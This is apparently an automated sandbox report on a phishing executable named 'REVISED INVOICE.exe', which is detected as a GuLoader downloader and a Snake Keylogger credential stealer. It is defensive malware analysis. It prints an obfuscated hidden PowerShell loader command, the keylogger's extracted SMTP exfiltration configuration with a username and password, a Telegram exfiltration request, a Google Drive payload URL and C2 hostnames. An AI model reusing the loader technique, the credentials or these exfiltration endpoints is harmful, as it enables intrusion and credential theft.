Windows Analysis Report
REVISED INVOICE.exe

Overview

General Information

Sample name: REVISED INVOICE.exe
Analysis ID: 1541088
MD5: 8274b1a41b53bf35e0b4330a20010d4c
SHA1: 0b263f01dd3e10389cd4fe6575d114ea301ee874
SHA256: d2320e5704e90bc713c59a0521bacf04ca5751c2481e1dd4e3a95494981d867c
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w7x64
  • REVISED INVOICE.exe (PID: 3476 cmdline: "C:\Users\user\Desktop\REVISED INVOICE.exe" MD5: 8274B1A41B53BF35E0B4330A20010D4C)
    • powershell.exe (PID: 1960 cmdline: powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • msiexec.exe (PID: 2504 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "alex@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000003.00000002.482186551.0000000009778000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: msiexec.exe PID: 2504 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: msiexec.exe PID: 2504 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |

          System Summary

          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.186.142, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2504, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1960, TargetFilename: C:\Users\user\AppData\Local\fona\Kvit\REVISED INVOICE.exe
          Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\SysWOW64\msiexec.exe, QueryName: checkip.dyndns.org
          Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 2504, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)", CommandLine: powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\REVISED INVOICE.exe", ParentImage: C:\Users\user\Desktop\REVISED INVOICE.exe, ParentProcessId: 3476, ParentProcessName: REVISED INVOICE.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)", ProcessId: 1960, ProcessName: powershell.exe
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1960, TargetFilename: C:\Users\user\AppData\Local\Temp\xb55l4s3.d1s.ps1
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T12:03:11.519251+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49166 | 188.114.97.3 | 443 | TCP
2024-10-24T12:03:19.225896+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49174 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T12:03:09.780235+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49164 | 193.122.130.0 | 80 | TCP
2024-10-24T12:03:10.952320+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49164 | 193.122.130.0 | 80 | TCP
2024-10-24T12:03:12.849739+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49167 | 132.226.8.169 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T12:03:03.413673+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49162 | 142.250.186.142 | 443 | TCP

          AV Detection

          Source: 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "alex@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability

          Location Tracking

          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: REVISED INVOICE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.22:49162 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2
          Source: REVISED INVOICE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: e:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000003.00000002.481790461.0000000004E36000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_00406362 FindFirstFileW,FindClose,0_2_00406362
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405810
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B9449h5_2_214B9188
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B9A0Bh5_2_214B95F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B9A0Bh5_2_214B993A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214BFC19h5_2_214BF939
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214BF2E9h5_2_214BF009
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B67D4h5_2_214B6823
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214BEE51h5_2_214BEB70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_214B72B2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B9A0Bh5_2_214B95E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_214B6C80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_214B7491
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214BF781h5_2_214BF4A1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B7945h5_2_214B7758
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B82CFh5_2_214B7758
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 214B67D4h5_2_214B6638
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21588A42h5_2_21588748
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21582C69h5_2_21582998
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158E052h5_2_2158DD58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21585A19h5_2_21585748
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158F83Ah5_2_2158F540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21580C41h5_2_21580970
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21587A41h5_2_21587770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158C86Ah5_2_2158C570
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21583A31h5_2_21583760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158BA12h5_2_2158B718
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215867E1h5_2_21586510
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215827D1h5_2_21582500
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158D1FAh5_2_2158CF00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21581A09h5_2_21581738
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158A22Ah5_2_21589F30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21581EA1h5_2_21581BD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158D6C2h5_2_2158D3C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21583EA1h5_2_21583BF8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158A6F2h5_2_2158A3F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21585EB1h5_2_21585BE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158BEDAh5_2_2158BBE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158B082h5_2_2158AD88
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21584C51h5_2_21584980
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158EEAAh5_2_2158EBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21586C7Ah5_2_215869A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158989Ah5_2_215895A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21584321h5_2_21584050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158B54Ah5_2_2158B250
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21580311h5_2_21580040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21587111h5_2_21586E40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21586349h5_2_21586078
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158F372h5_2_2158F078
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21582339h5_2_21582068
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21589D62h5_2_21589A68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215850E9h5_2_21584E18
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21588F0Ah5_2_21588C10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215810D9h5_2_21580E08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21587ED9h5_2_21587C08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158FD02h5_2_2158FA08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158CD32h5_2_2158CA38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21583101h5_2_21582E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158E51Ah5_2_2158E220
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215807A9h5_2_215804D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215875A9h5_2_215872D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215893D2h5_2_215890D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21583599h5_2_215832C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158ABBAh5_2_2158A8C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 215847B9h5_2_215844E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158E9E2h5_2_2158E6E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158DB8Ah5_2_2158D890
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21585581h5_2_215852B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2158C3A2h5_2_2158C0A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21581571h5_2_215812A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21588412h5_2_215880A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2169165Ah5_2_21691360
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21692E42h5_2_21692B48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21690802h5_2_21690508
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21690CCAh5_2_216909D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21693C9Ah5_2_216939A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 216924B2h5_2_216921B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21694162h5_2_21693E68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2169033Ah5_2_21690040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21691B22h5_2_21691828
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2169330Ah5_2_21693010
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21691FEAh5_2_21691CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 216937D2h5_2_216934D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2169297Bh5_2_21692680
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21691192h5_2_21690E98
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_21725F38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_21725F28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_21722E16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_21722B00

          Networking

          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2010/24/2024%20/%208:39:12%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: checkip.dyndns.org
          Source: C:\Windows\SysWOW64\msiexec.exeDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49167 -> 132.226.8.169:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49164 -> 193.122.130.0:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49174 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.22:49162 -> 142.250.186.142:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49166 -> 188.114.97.3:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: global traffic | DNS traffic detected: DNS query: drive.google.com
          Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
          Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 24 Oct 2024 10:03:25 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
          Source: msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
          Source: msiexec.exe, 00000005.00000002.629157566.00000000222F4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
